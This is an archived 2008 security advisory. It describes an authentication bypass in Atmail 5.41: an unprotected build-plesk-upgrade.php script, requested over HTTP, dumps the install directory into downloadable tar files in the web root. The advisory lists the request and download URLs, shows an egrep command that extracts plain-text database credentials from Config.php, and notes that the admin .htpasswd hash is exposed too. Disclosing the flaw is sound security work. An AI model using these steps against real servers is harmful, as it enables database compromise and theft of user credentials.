Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20267
HistoryAug 01, 2008 - 12:00 a.m.

Atmail Remote Authentication Bypass, Full DB Compromise

2008-08-0100:00:00
vulners.com
91

@Mail PHP Version 5.41 patch Release
http://atmail.com/demo/atmailphpdemo.tgz

The default install of Atmail 5.41 creates the following
file in the atmail/ directory: build-plesk-upgrade.php

If that file is called via http, such as: http://example.com/atmail/build-plesk-upgrade.php
it will execute on the local server as expected:

nobody 19495 11.3 0.0 22572 8908 ? S 17:25 0:00 /usr/bin/php
/usr/local/apache/htdocs/atmail/build-plesk-upgrade.php

producing numerous warnings and errors:

building @Mail-Plesk Pro upgrade
Warning: mkdir() [function.mkdir]: Permission denied in /usr/local/apache/htdocs/atmail/build-plesk-upgrade.php on
line 32
making . dir… making /usr/local/atmail-plesk-upgrade/.

and when complete the following files will exist:

/usr/local/apache/htdocs/atmail:
-rw-r–r-- 1 nobody nobody 101754880 Jul 30 17:26 files.tar
-rw-r–r-- 1 nobody nobody 27162656 Jul 30 17:26 plesk-atmail-upgrade.tgz

Those files are the contents of the atmail/ directory. The plesk-atmail-upgrade.tgz
only contains the files.tar file.

Either file could then be downloaded:

http://example.com/atmail/files.tar
http://example.com/atmail/plesk-atmail-upgrade.tgz

or copied to another directory on the server for browsing through. The information
contained in those files includes the Atmail Config.php file which stores the Atmail
database username, password, and database server hostname in plain text:

$ egrep 'sql_(user|host|pass)' libs/Atmail/Config.php
'sql_host' => 'localhost',
'sql_pass' => '43s2H4N55X',
'sql_user' => 'atmail',

This information could then be used to access the Atmail database to obtain client credentials,
such as email addresses, usernames, passwords, session IDs, and more.

Also in the files.tar file is the webadmin/.htpasswd file, which contains the administrator
user's username and password hash.